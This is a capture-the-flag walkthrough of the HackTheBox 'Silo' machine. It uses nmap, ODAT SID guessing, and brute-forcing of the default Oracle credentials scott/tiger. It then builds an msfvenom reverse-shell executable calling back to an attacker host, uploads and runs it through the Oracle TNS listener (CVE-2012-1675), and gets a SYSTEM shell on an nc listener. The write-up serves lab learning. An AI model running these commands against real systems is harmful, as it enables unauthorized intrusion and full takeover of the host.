Hero Image

[HTB] Silo - Writeup

Preface: Silo is a medium box on HackTheBox.eu. With an basic nmap scan we will find a bunch of open ports. But the most interesting one is the port 1521. There is a "Oracle TNS listener" running on it. After some enumeration I found an CVE for the service. With ODAT we are able to discover further informations which enable us to upload and execute files. We will upload and execute our own reverse shell and get directly the administrator shell. Hack the box infocard silo

Information gathering

As always we start with an nmap scan for open ports and services:

$ sudo nmap -sC -sV -oN nmap/silo.nmap 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 19:33 CET
Nmap scan report for 10.10.10.82
Host is up (0.14s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 9m31s, deviation: 0s, median: 9m30s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-02-13T18:45:21
|_  start_date: 2021-02-13T18:42:18

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.61 seconds

We get a bunch of ports but the most interesting one is 1521. Because there runs a Oracle TNS listener service which allows unauthorized access. After a bit enumeration on google I found the CVE-2012-1675. Which is a "TNS Listener Poison Attack". I also found a nmap script oracle-tns-poison.nse to verify the vulnerability.

So let's verify it the box is vulnerable to the CVE-2012-1675. First we clone the GitHub repo and change our directory to it:

$ git clone https://github.com/bongbongco/CVE-2012-1675.git 
$ cd CVE-2012-1675

Now we can verify it. There is also a example in the README.md.

$ nmap -Pn -sT --script=./oracle-tns-poison -p 1521 10.10.10.82
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 19:51 CET
NSE: DEPRECATION WARNING: bin.lua is deprecated. Please use Lua 5.3 string.pack
Nmap scan report for silo.htb (10.10.10.82)
Host is up (0.23s latency).

PORT     STATE SERVICE
1521/tcp open  oracle
|_oracle-tns-poison: Host is vulnerable!

Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds

Awesome! The host is vulnerable so we can use it.

Exploitation

We discovered the vulnerability of the box. No we have to search for an existing exploit or tool that we can use for our case. After a while I found the ODAT (Oracle Database Attacking Tool). In the README.md I found a module for our CVE-2012-1675. So let's try this tool.

First we have to clone the repo and change our directory to it:

$ git clone https://github.com/quentinhardy/odat.git
$ cd odat

Now we can try the tnspoison module:

$ python3 odat.py tnspoison -s 10.10.10.82 --test-module
07:43:54 CRITICAL -: The server SID or Service Name must be given with the '-d SID' or '-n serviceName' option.

But we need the server SID. Let's see how we can discover it.

The help menu of odat.py show's us a module sidguesser. I think this is what we need.

$ python3 odat.py sidguesser -s 10.10.10.82
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...      
###############################################################################################################  | ETA:  00:00:00 
100% |###########################################################################################################| Time: 00:01:30 
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |###########################################################################################################| Time: 00:00:02 
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...              ##############################################################################                   | ETA:  00:00:08 
100% |###########################################################################################################| Time: 00:01:13 
[+] SIDs found on the 10.10.10.82:1521 server: XE

And we got our SID: XE

Now we can test again the tnspoison module. I always try to verify the vulnerability before I ran into a rabbit hole.

$ python3 odat.py tnspoison -s 10.10.10.82 -d XE --test-modul
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning

Yes, it works. In the help menu of odat.py I saw the module passwordguesser. Maybe we can extract some credentials. Because we got the SID. This is mostly always required for the modules.

$ python3 odat.py passwordguesser -s 10.10.10.82 -d XE
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
....
[+] Accounts found on 10.10.10.82:1521/sid:XE: 
scott/tiger

Awesome! We found some valid credentials. So maybe we are able to upload our reverse shell. There is a module named utlfile. With this we can upload/download/delete files. But first we have to create our reverse shell.

I will use msfvenom for it:

$ msfvenom -p windows/x64/shell_reverse_tcp  LHOST=10.10.14.3 LPORT=4444 -f exe > qwertty.exe

Now we can upload it with the odat.py

$ python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --putFile c:/ qwertty.exe ../qwertty.exe
[1] (10.10.10.82:1521): Put the ../qwertty.exe local file in the c:/ folder like qwertty.exe on the 10.10.10.82 server
[+] The ../qwertty.exe file was created on the c:/ directory on the 10.10.10.82 server like the qwertty.exe file

Nice, the file was created on the box.

No let's start our nc listener on port 4444

$ nc -lvnp 4444

Now we can use the module externaltable. It took me a while to discover this module because it is not an obvious name for what we was looking for. But the description says what we want:

to read files or to execute system commands/scripts

Let's try it:

$ python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --exec c:/ qwertty.exe
[1] (10.10.10.82:1521): Execute the qwertty.exe command stored in the c:/ path

Hopefully we got the reverse shell. Let's check our nc listener:

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.82] 49163
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>

Nice! We got the shell. Now we can grab the user and root flag.

SHELL: nt authority\system


Thanks for reading! I hope you enjoyed it!